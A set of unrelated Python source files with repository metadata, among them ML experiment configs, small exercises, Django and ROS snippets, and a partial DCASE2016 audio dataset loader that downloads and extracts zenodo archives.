fc023f325bac01c708172ac7efe7e26fded07e1b | 172 | py | Python | cosmosis/datablock/__init__.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-09-15T10:10:26.000Z | 2021-09-15T10:10:26.000Z | cosmosis/datablock/__init__.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | null | null | null | cosmosis/datablock/__init__.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-06-11T15:29:43.000Z | 2021-06-11T15:29:43.000Z | from __future__ import absolute_import
from .cosmosis_py.block import DataBlock, BlockError, option_section, SectionOptions
from .cosmosis_py import section_names as names
| 43 | 84 | 0.866279 | 23 | 172 | 6.086957 | 0.608696 | 0.171429 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098837 | 172 | 3 | 85 | 57.333333 | 0.903226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fc46fb3ed4dc406673332d1f4b441333a8a98172 | 2,533 | py | Python | experiment_scripts/paper_runs/big_batch/make_resnet_long.py | jacqueschen1/adam_sgd_heavy_tails | d4ecab6d460fb44ac3fd2b865641b8e47f3848ee | [
"Apache-2.0"
] | 1 | 2021-12-02T21:47:46.000Z | 2021-12-02T21:47:46.000Z | experiment_scripts/paper_runs/big_batch/make_resnet_long.py | jacqueschen1/adam_sgd_heavy_tails | d4ecab6d460fb44ac3fd2b865641b8e47f3848ee | [
"Apache-2.0"
] | null | null | null | experiment_scripts/paper_runs/big_batch/make_resnet_long.py | jacqueschen1/adam_sgd_heavy_tails | d4ecab6d460fb44ac3fd2b865641b8e47f3848ee | [
"Apache-2.0"
] | null | null | null | # 5 hours big gpu
import numpy as np
import explib
def merge_grids(*grids):
return sorted(list(set.union(*[set(grid) for grid in grids])))
EXPERIMENTS = []
EXPERIMENTS_SGD = [
{
"loss_func": "logloss",
"metrics": ["accuracy"],
"dataset": "cifar100",
"model": "resnet50",
"batch_size": b_size,
"max_epoch": 400,
"seed": seed,
"opt": {
"name": "SGD",
"alpha": alpha,
},
"drop_last": True,
"final_reruns": True,
}
for alpha in np.logspace(-8, 1, num=10, base=10)
for seed in range(5)
for b_size in [16384]
]
EXPERIMENTS_ADAM = [
{
"loss_func": "logloss",
"metrics": ["accuracy"],
"dataset": "cifar100",
"model": "resnet50",
"batch_size": b_size,
"max_epoch": 400,
"seed": seed,
"opt": {
"name": "Adam",
"alpha": alpha,
"b1": 0.9,
"b2": 0.999,
},
"drop_last": True,
"final_reruns": True,
}
for alpha in np.logspace(-8, 1, num=10, base=10)
for seed in range(5)
for b_size in [16384]
]
EXPERIMENTS.extend(EXPERIMENTS_SGD)
EXPERIMENTS.extend(EXPERIMENTS_ADAM)
EXPERIMENTS_SGD = [
{
"loss_func": "logloss",
"metrics": ["accuracy"],
"dataset": "cifar10",
"model": "resnet34",
"batch_size": b_size,
"max_epoch": 400,
"seed": seed,
"opt": {
"name": "SGD",
"alpha": alpha,
},
"drop_last": True,
"final_reruns": True,
}
for alpha in merge_grids(
np.logspace(-4, 0, num=5, base=10), np.logspace(-2, 0, num=6, base=10)
)
for seed in range(5)
for b_size in [16384]
]
EXPERIMENTS_ADAM = [
{
"loss_func": "logloss",
"metrics": ["accuracy"],
"dataset": "cifar10",
"model": "resnet34",
"batch_size": b_size,
"max_epoch": 400,
"seed": seed,
"opt": {
"name": "Adam",
"alpha": alpha,
"b1": 0.9,
"b2": 0.999,
},
"drop_last": True,
"final_reruns": True,
}
for alpha in np.logspace(-6, 1, num=8, base=10)
for seed in range(5)
for b_size in [16384]
]
EXPERIMENTS.extend(EXPERIMENTS_SGD)
EXPERIMENTS.extend(EXPERIMENTS_ADAM)
if __name__ == "__main__":
explib.expmaker.experiment_maker_cli(
descr="all experiments", experiments=EXPERIMENTS
)
| 22.415929 | 78 | 0.506119 | 285 | 2,533 | 4.329825 | 0.259649 | 0.032415 | 0.048622 | 0.071313 | 0.797407 | 0.797407 | 0.797407 | 0.797407 | 0.774716 | 0.774716 | 0 | 0.058333 | 0.336755 | 2,533 | 112 | 79 | 22.616071 | 0.67619 | 0.005922 | 0 | 0.707071 | 0 | 0 | 0.199921 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010101 | false | 0 | 0.020202 | 0.010101 | 0.040404 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc4d5499ac2a623993710f43ece8ab531d8bc521 | 35 | py | Python | Problems/fyi.py | rikgj/Kattis | 2e34dee307aef5acea5837732bf9f27f8c548e9c | [
"MIT"
] | null | null | null | Problems/fyi.py | rikgj/Kattis | 2e34dee307aef5acea5837732bf9f27f8c548e9c | [
"MIT"
] | null | null | null | Problems/fyi.py | rikgj/Kattis | 2e34dee307aef5acea5837732bf9f27f8c548e9c | [
"MIT"
] | null | null | null |
print(int(input()[0:3] == '555'))
| 11.666667 | 33 | 0.514286 | 6 | 35 | 3 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16129 | 0.114286 | 35 | 2 | 34 | 17.5 | 0.419355 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
fc6033501eb354de17cc3c750aa055aaa5d38b09 | 181 | py | Python | Darlington/phase2/STRINGS/day 32 solution/qtn9.py | CodedLadiesInnovateTech/-python-challenge-solutions | 430cd3eb84a2905a286819eef384ee484d8eb9e7 | [
"MIT"
] | 6 | 2020-05-23T19:53:25.000Z | 2021-05-08T20:21:30.000Z | Darlington/phase2/STRINGS/day 32 solution/qtn9.py | CodedLadiesInnovateTech/-python-challenge-solutions | 430cd3eb84a2905a286819eef384ee484d8eb9e7 | [
"MIT"
] | 8 | 2020-05-14T18:53:12.000Z | 2020-07-03T00:06:20.000Z | Darlington/phase2/STRINGS/day 32 solution/qtn9.py | CodedLadiesInnovateTech/-python-challenge-solutions | 430cd3eb84a2905a286819eef384ee484d8eb9e7 | [
"MIT"
] | 39 | 2020-05-10T20:55:02.000Z | 2020-09-12T17:40:59.000Z | #program to reverse a string.
def reverse_string(str1):
return ''.join(reversed(str1))
print()
print(reverse_string("abcdef"))
print(reverse_string("Python Exercises."))
print() | 25.857143 | 42 | 0.745856 | 24 | 181 | 5.5 | 0.583333 | 0.295455 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012195 | 0.093923 | 181 | 7 | 43 | 25.857143 | 0.792683 | 0.154696 | 0 | 0.333333 | 0 | 0 | 0.150327 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0.166667 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 6 |
fc694957398f13cda1ea4e009b21ca818b97b2cd | 87 | py | Python | example_project/core/context_processors.py | pnuckowski/django-guardian | 8e8dab207296ee37aa1d19eaeebfad7d0642f138 | [
"MIT"
] | 2,469 | 2015-07-27T14:21:38.000Z | 2022-03-29T23:37:37.000Z | example_project/core/context_processors.py | meetbill/django-guardian | d3611494c1e40a67b20e32ffe9e5198a53923aa2 | [
"MIT"
] | 458 | 2015-07-27T12:02:14.000Z | 2022-03-25T21:42:59.000Z | example_project/core/context_processors.py | meetbill/django-guardian | d3611494c1e40a67b20e32ffe9e5198a53923aa2 | [
"MIT"
] | 429 | 2015-07-31T08:04:17.000Z | 2022-03-11T09:28:55.000Z | import guardian
def version(request):
return {'version': guardian.get_version()}
| 14.5 | 46 | 0.724138 | 10 | 87 | 6.2 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.149425 | 87 | 5 | 47 | 17.4 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0.08046 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
fc85cf1e7c5fd7342d783b5ef7529be48deb2500 | 889 | py | Python | build/mavros/catkin_generated/pkg.installspace.context.pc.py | arijitnoobstar/UAVProjectileCatcher | 3c1bed80df167192cb4b971b58c891187628142e | [
"Apache-2.0"
] | 10 | 2021-03-15T03:58:06.000Z | 2021-12-30T15:33:38.000Z | build/mavros/catkin_generated/pkg.installspace.context.pc.py | arijitnoobstar/UAVProjectileCatcher | 3c1bed80df167192cb4b971b58c891187628142e | [
"Apache-2.0"
] | 1 | 2021-09-09T15:29:31.000Z | 2021-09-09T15:29:31.000Z | build/mavros/catkin_generated/pkg.installspace.context.pc.py | arijitnoobstar/UAVProjectileCatcher | 3c1bed80df167192cb4b971b58c891187628142e | [
"Apache-2.0"
] | 4 | 2021-03-06T09:35:58.000Z | 2021-05-24T14:34:11.000Z | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include;/usr/include;/usr/include/eigen3".split(';') if "${prefix}/include;/usr/include;/usr/include/eigen3" != "" else []
PROJECT_CATKIN_DEPENDS = "diagnostic_msgs;diagnostic_updater;eigen_conversions;geographic_msgs;geometry_msgs;libmavconn;mavros_msgs;message_runtime;nav_msgs;pluginlib;roscpp;sensor_msgs;std_msgs;tf2_ros;trajectory_msgs;message_runtime".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lmavros;/usr/lib/x86_64-linux-gnu/libboost_system.so;/usr/lib/x86_64-linux-gnu/libGeographic.so".split(';') if "-lmavros;/usr/lib/x86_64-linux-gnu/libboost_system.so;/usr/lib/x86_64-linux-gnu/libGeographic.so" != "" else []
PROJECT_NAME = "mavros"
PROJECT_SPACE_DIR = "/home/arijitnoobstar/UAVProjectileCatcher/install"
PROJECT_VERSION = "1.5.1"
| 98.777778 | 260 | 0.7964 | 126 | 889 | 5.34127 | 0.5 | 0.059435 | 0.10104 | 0.065379 | 0.341753 | 0.341753 | 0.341753 | 0.225854 | 0.225854 | 0.225854 | 0 | 0.025882 | 0.04387 | 889 | 8 | 261 | 111.125 | 0.765882 | 0.060742 | 0 | 0 | 1 | 0.428571 | 0.677071 | 0.659064 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc8e644e558c4bd2c034ae8070b2035cf44c3083 | 138 | py | Python | trend/views.py | power3247/project3 | 0702d4754b3cb2b570b1d01df77d412c51eb28a6 | [
"Apache-2.0"
] | null | null | null | trend/views.py | power3247/project3 | 0702d4754b3cb2b570b1d01df77d412c51eb28a6 | [
"Apache-2.0"
] | null | null | null | trend/views.py | power3247/project3 | 0702d4754b3cb2b570b1d01df77d412c51eb28a6 | [
"Apache-2.0"
] | null | null | null | from django.shortcuts import render
# Create your views here.
def trendview(request):
return render(request, 'trend/trend.html')
| 13.8 | 46 | 0.73913 | 18 | 138 | 5.666667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 138 | 9 | 47 | 15.333333 | 0.886957 | 0.166667 | 0 | 0 | 0 | 0 | 0.144144 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
5d7652870c78561dc44db65a46067e300da437c2 | 78,389 | py | Python | runs/2016/dnn2016verylarge/src/dataset.py | rohit21122012/DCASE2013 | 5360402265331d1c9032cf0fa94ef73f8c3c1047 | [
"MIT"
] | 2 | 2016-10-19T06:26:50.000Z | 2016-10-19T13:39:42.000Z | runs/2016/dnn2016verylarge/src/dataset.py | rohit21122012/DCASE2013 | 5360402265331d1c9032cf0fa94ef73f8c3c1047 | [
"MIT"
] | null | null | null | runs/2016/dnn2016verylarge/src/dataset.py | rohit21122012/DCASE2013 | 5360402265331d1c9032cf0fa94ef73f8c3c1047 | [
"MIT"
] | 2 | 2016-06-29T02:32:05.000Z | 2017-08-05T08:15:11.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import urllib2
import socket
import locale
import zipfile
import tarfile
from sklearn.cross_validation import StratifiedShuffleSplit, KFold
from ui import *
from general import *
from files import *
class Dataset(object):
"""Dataset base class.
The specific dataset classes are inherited from this class, and only needed methods are reimplemented.
"""
def __init__(self, data_path='data', name='dataset'):
"""__init__ method.
Parameters
----------
data_path : str
Basepath where the dataset is stored.
(Default value='data')
"""
# Folder name for dataset
self.name = name
# Path to the dataset
self.local_path = os.path.join(data_path, self.name)
# Create the dataset path if does not exist
if not os.path.isdir(self.local_path):
os.makedirs(self.local_path)
# Evaluation setup folder
self.evaluation_setup_folder = 'evaluation_setup'
# Path to the folder containing evaluation setup files
self.evaluation_setup_path = os.path.join(self.local_path, self.evaluation_setup_folder)
# Meta data file, csv-format
self.meta_filename = 'meta.txt'
# Path to meta data file
self.meta_file = os.path.join(self.local_path, self.meta_filename)
# Hash file to detect removed or added files
self.filelisthash_filename = 'filelist.hash'
# Number of evaluation folds
self.evaluation_folds = 1
# List containing dataset package items
# Define this in the inherited class.
# Format:
# {
# 'remote_package': download_url,
# 'local_package': os.path.join(self.local_path, 'name_of_downloaded_package'),
# 'local_audio_path': os.path.join(self.local_path, 'name_of_folder_containing_audio_files'),
# }
self.package_list = []
# List of audio files
self.files = None
# List of meta data dict
self.meta_data = None
# Training meta data for folds
self.evaluation_data_train = {}
# Testing meta data for folds
self.evaluation_data_test = {}
# Recognized audio extensions
self.audio_extensions = {'wav', 'flac'}
# Info fields for dataset
self.authors = ''
self.name_remote = ''
self.url = ''
self.audio_source = ''
self.audio_type = ''
self.recording_device_model = ''
self.microphone_model = ''
@property
def audio_files(self):
"""Get all audio files in the dataset
Parameters
----------
Nothing
Returns
-------
filelist : list
File list with absolute paths
"""
if self.files is None:
self.files = []
for item in self.package_list:
path = item['local_audio_path']
if path:
l = os.listdir(path)
for f in l:
file_name, file_extension = os.path.splitext(f)
if file_extension[1:] in self.audio_extensions:
self.files.append(os.path.abspath(os.path.join(path, f)))
self.files.sort()
return self.files
@property
def audio_file_count(self):
"""Get number of audio files in dataset
Parameters
----------
Nothing
Returns
-------
filecount : int
Number of audio files
"""
return len(self.audio_files)
@property
def meta(self):
"""Get meta data for dataset. If not already read from disk, data is read and returned.
Parameters
----------
Nothing
Returns
-------
meta_data : list
List containing meta data as dict.
Raises
-------
IOError
meta file not found.
"""
if self.meta_data is None:
self.meta_data = []
meta_id = 0
if os.path.isfile(self.meta_file):
f = open(self.meta_file, 'rt')
try:
reader = csv.reader(f, delimiter='\t')
for row in reader:
if len(row) == 2:
# Scene meta
self.meta_data.append({'file': row[0], 'scene_label': row[1].rstrip()})
elif len(row) == 4:
# Audio tagging meta
self.meta_data.append(
{'file': row[0], 'scene_label': row[1].rstrip(), 'tag_string': row[2].rstrip(),
'tags': row[3].split(';')})
elif len(row) == 6:
# Event meta
self.meta_data.append({'file': row[0],
'scene_label': row[1].rstrip(),
'event_onset': float(row[2]),
'event_offset': float(row[3]),
'event_label': row[4].rstrip(),
'event_type': row[5].rstrip(),
'id': meta_id
})
meta_id += 1
finally:
f.close()
else:
raise IOError("Meta file not found [%s]" % self.meta_file)
return self.meta_data
@property
def meta_count(self):
"""Number of meta data items.
Parameters
----------
Nothing
Returns
-------
meta_item_count : int
Meta data item count
"""
return len(self.meta)
@property
def fold_count(self):
"""Number of fold in the evaluation setup.
Parameters
----------
Nothing
Returns
-------
fold_count : int
Number of folds
"""
return self.evaluation_folds
@property
def scene_labels(self):
"""List of unique scene labels in the meta data.
Parameters
----------
Nothing
Returns
-------
labels : list
List of scene labels in alphabetical order.
"""
labels = []
for item in self.meta:
if 'scene_label' in item and item['scene_label'] not in labels:
labels.append(item['scene_label'])
labels.sort()
return labels
@property
def scene_label_count(self):
"""Number of unique scene labels in the meta data.
Parameters
----------
Nothing
Returns
-------
scene_label_count : int
Number of unique scene labels.
"""
return len(self.scene_labels)
@property
def event_labels(self):
"""List of unique event labels in the meta data.
Parameters
----------
Nothing
Returns
-------
labels : list
List of event labels in alphabetical order.
"""
labels = []
for item in self.meta:
if 'event_label' in item and item['event_label'].rstrip() not in labels:
labels.append(item['event_label'].rstrip())
labels.sort()
return labels
@property
def event_label_count(self):
"""Number of unique event labels in the meta data.
Parameters
----------
Nothing
Returns
-------
event_label_count : int
Number of unique event labels
"""
return len(self.event_labels)
@property
def audio_tags(self):
"""List of unique audio tags in the meta data.
Parameters
----------
Nothing
Returns
-------
labels : list
List of audio tags in alphabetical order.
"""
tags = []
for item in self.meta:
if 'tags' in item:
for tag in item['tags']:
if tag and tag not in tags:
tags.append(tag)
tags.sort()
return tags
@property
def audio_tag_count(self):
"""Number of unique audio tags in the meta data.
Parameters
----------
Nothing
Returns
-------
audio_tag_count : int
Number of unique audio tags
"""
return len(self.audio_tags)
def __getitem__(self, i):
"""Getting meta data item
Parameters
----------
i : int
item id
Returns
-------
meta_data : dict
Meta data item
"""
if i < len(self.meta):
return self.meta[i]
else:
return None
def __iter__(self):
"""Iterator for meta data items
Parameters
----------
Nothing
Returns
-------
Nothing
"""
i = 0
meta = self[i]
# yield window while it's valid
while meta is not None:
yield meta
# get next item
i += 1
meta = self[i]
@staticmethod
def print_bytes(num_bytes):
"""Output number of bytes according to locale and with IEC binary prefixes
Parameters
----------
num_bytes : int > 0 [scalar]
Bytes
Returns
-------
bytes : str
Human readable string
"""
KiB = 1024
MiB = KiB * KiB
GiB = KiB * MiB
TiB = KiB * GiB
PiB = KiB * TiB
EiB = KiB * PiB
ZiB = KiB * EiB
YiB = KiB * ZiB
locale.setlocale(locale.LC_ALL, '')
output = locale.format("%d", num_bytes, grouping=True) + ' bytes'
if num_bytes > YiB:
output += ' (%.4g YiB)' % (num_bytes / YiB)
elif num_bytes > ZiB:
output += ' (%.4g ZiB)' % (num_bytes / ZiB)
elif num_bytes > EiB:
output += ' (%.4g EiB)' % (num_bytes / EiB)
elif num_bytes > PiB:
output += ' (%.4g PiB)' % (num_bytes / PiB)
elif num_bytes > TiB:
output += ' (%.4g TiB)' % (num_bytes / TiB)
elif num_bytes > GiB:
output += ' (%.4g GiB)' % (num_bytes / GiB)
elif num_bytes > MiB:
output += ' (%.4g MiB)' % (num_bytes / MiB)
elif num_bytes > KiB:
output += ' (%.4g KiB)' % (num_bytes / KiB)
return output
def download(self):
"""Download dataset over the internet to the local path
Parameters
----------
Nothing
Returns
-------
Nothing
Raises
-------
IOError
Download failed.
"""
section_header('Download dataset')
for item in self.package_list:
try:
if item['remote_package'] and not os.path.isfile(item['local_package']):
data = None
req = urllib2.Request(item['remote_package'], data, {})
handle = urllib2.urlopen(req)
if "Content-Length" in handle.headers.items():
size = int(handle.info()["Content-Length"])
else:
size = None
actualSize = 0
blocksize = 64 * 1024
tmp_file = os.path.join(self.local_path, 'tmp_file')
fo = open(tmp_file, "wb")
terminate = False
while not terminate:
block = handle.read(blocksize)
actualSize += len(block)
if size:
progress(title_text=os.path.split(item['local_package'])[1],
percentage=actualSize / float(size),
note=self.print_bytes(actualSize))
else:
progress(title_text=os.path.split(item['local_package'])[1],
note=self.print_bytes(actualSize))
if len(block) == 0:
break
fo.write(block)
fo.close()
os.rename(tmp_file, item['local_package'])
except (urllib2.URLError, socket.timeout), e:
try:
fo.close()
except:
raise IOError('Download failed [%s]' % (item['remote_package']))
foot()
def extract(self):
"""Extract the dataset packages
Parameters
----------
Nothing
Returns
-------
Nothing
"""
section_header('Extract dataset')
for item_id, item in enumerate(self.package_list):
if item['local_package']:
if item['local_package'].endswith('.zip'):
with zipfile.ZipFile(item['local_package'], "r") as z:
# Trick to omit first level folder
parts = []
for name in z.namelist():
if not name.endswith('/'):
parts.append(name.split('/')[:-1])
prefix = os.path.commonprefix(parts) or ''
if prefix:
if len(prefix) > 1:
prefix_ = list()
prefix_.append(prefix[0])
prefix = prefix_
prefix = '/'.join(prefix) + '/'
offset = len(prefix)
# Start extraction
members = z.infolist()
file_count = 1
for i, member in enumerate(members):
if len(member.filename) > offset:
member.filename = member.filename[offset:]
if not os.path.isfile(os.path.join(self.local_path, member.filename)):
z.extract(member, self.local_path)
progress(title_text='Extracting ['+str(item_id)+'/'+str(len(self.package_list))+']', percentage=(file_count / float(len(members))),
note=member.filename)
file_count += 1
elif item['local_package'].endswith('.tar.gz'):
tar = tarfile.open(item['local_package'], "r:gz")
for i, tar_info in enumerate(tar):
if not os.path.isfile(os.path.join(self.local_path, tar_info.name)):
tar.extract(tar_info, self.local_path)
progress(title_text='Extracting ['+str(item_id)+'/'+str(len(self.package_list))+']', note=tar_info.name)
tar.members = []
tar.close()
foot()
def on_after_extract(self):
"""Dataset meta data preparation, this will be overloaded in dataset specific classes
Parameters
----------
Nothing
Returns
-------
Nothing
"""
pass
def get_filelist(self):
"""List of files under local_path
Parameters
----------
Nothing
Returns
-------
filelist: list
File list
"""
filelist = []
for path, subdirs, files in os.walk(self.local_path):
for name in files:
filelist.append(os.path.join(path, name))
return filelist
def check_filelist(self):
"""Generates hash from file list and check does it matches with one saved in filelist.hash.
If some files have been deleted or added, checking will result False.
Parameters
----------
Nothing
Returns
-------
result: bool
Result
"""
if os.path.isfile(os.path.join(self.local_path, self.filelisthash_filename)):
hash = load_text(os.path.join(self.local_path, self.filelisthash_filename))[0]
if hash != get_parameter_hash(sorted(self.get_filelist())):
return False
else:
return True
else:
return False
def save_filelist_hash(self):
"""Generates file list hash, and saves it as filelist.hash under local_path.
Parameters
----------
Nothing
Returns
-------
Nothing
"""
filelist = self.get_filelist()
filelist_hash_not_found = True
for file in filelist:
if self.filelisthash_filename in file:
filelist_hash_not_found = False
if filelist_hash_not_found:
filelist.append(os.path.join(self.local_path, self.filelisthash_filename))
save_text(os.path.join(self.local_path, self.filelisthash_filename), get_parameter_hash(sorted(filelist)))
def fetch(self):
"""Download, extract and prepare the dataset.
Parameters
----------
Nothing
Returns
-------
Nothing
"""
if not self.check_filelist():
self.download()
self.extract()
self.on_after_extract()
self.save_filelist_hash()
return self
def train(self, fold=0):
"""List of training items.
Parameters
----------
fold : int > 0 [scalar]
Fold id, if zero all meta data is returned.
(Default value=0)
Returns
-------
list : list of dicts
List containing all meta data assigned to training set for given fold.
"""
if fold not in self.evaluation_data_train:
self.evaluation_data_train[fold] = []
if fold > 0:
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt'), 'rt') as f:
for row in csv.reader(f, delimiter='\t'):
if len(row) == 2:
# Scene meta
self.evaluation_data_train[fold].append({
'file': self.relative_to_absolute_path(row[0]),
'scene_label': row[1]
})
elif len(row) == 4:
# Audio tagging meta
self.evaluation_data_train[fold].append({
'file': self.relative_to_absolute_path(row[0]),
'scene_label': row[1],
'tag_string': row[2],
'tags': row[3].split(';')
})
elif len(row) == 5:
# Event meta
self.evaluation_data_train[fold].append({
'file': self.relative_to_absolute_path(row[0]),
'scene_label': row[1],
'event_onset': float(row[2]),
'event_offset': float(row[3]),
'event_label': row[4]
})
else:
data = []
for item in self.meta:
if 'event_label' in item:
data.append({'file': self.relative_to_absolute_path(item['file']),
'scene_label': item['scene_label'],
'event_onset': item['event_onset'],
'event_offset': item['event_offset'],
'event_label': item['event_label'],
})
else:
data.append({'file': self.relative_to_absolute_path(item['file']),
'scene_label': item['scene_label']
})
self.evaluation_data_train[0] = data
return self.evaluation_data_train[fold]
def test(self, fold=0):
"""List of testing items.
Parameters
----------
fold : int > 0 [scalar]
Fold id, if zero all meta data is returned.
(Default value=0)
Returns
-------
list : list of dicts
List containing all meta data assigned to testing set for given fold.
"""
if fold not in self.evaluation_data_test:
self.evaluation_data_test[fold] = []
if fold > 0:
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt'), 'rt') as f:
for row in csv.reader(f, delimiter='\t'):
self.evaluation_data_test[fold].append({'file': self.relative_to_absolute_path(row[0])})
else:
data = []
files = []
for item in self.meta:
if self.relative_to_absolute_path(item['file']) not in files:
data.append({'file': self.relative_to_absolute_path(item['file'])})
files.append(self.relative_to_absolute_path(item['file']))
self.evaluation_data_test[fold] = data
return self.evaluation_data_test[fold]
def folds(self, mode='folds'):
"""List of fold ids
Parameters
----------
mode : str {'folds','full'}
Fold setup type, possible values are 'folds' and 'full'. In 'full' mode fold number is set 0 and all data is used for training.
(Default value=folds)
Returns
-------
list : list of integers
Fold ids
"""
if mode == 'folds':
return range(1, self.evaluation_folds + 1)
elif mode == 'full':
return [0]
def file_meta(self, file):
"""Meta data for given file
Parameters
----------
file : str
File name
Returns
-------
list : list of dicts
List containing all meta data related to given file.
"""
file = self.absolute_to_relative(file)
file_meta = []
for item in self.meta:
if item['file'] == file:
file_meta.append(item)
return file_meta
def relative_to_absolute_path(self, path):
"""Converts relative path into absolute path.
Parameters
----------
path : str
Relative path
Returns
-------
path : str
Absolute path
"""
return os.path.abspath(os.path.join(self.local_path, path))
def absolute_to_relative(self, path):
"""Converts absolute path into relative path.
Parameters
----------
path : str
Absolute path
Returns
-------
path : str
Relative path
"""
if path.startswith(os.path.abspath(self.local_path)):
return os.path.relpath(path, self.local_path)
else:
return path
# =====================================================
# DCASE 2016
# =====================================================
class TUTAcousticScenes_2016_DevelopmentSet(Dataset):
"""TUT Acoustic scenes 2016 development dataset
This dataset is used in DCASE2016 - Task 1, Acoustic scene classification
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='TUT-acoustic-scenes-2016-development')
self.authors = 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen'
self.name_remote = 'TUT Acoustic Scenes 2016, development dataset'
self.url = 'https://zenodo.org/record/45739'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Roland Edirol R-09'
self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 4
self.package_list = [
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.doc.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.doc.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.meta.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.meta.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.1.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.1.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.2.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.2.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.3.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.3.zip'),
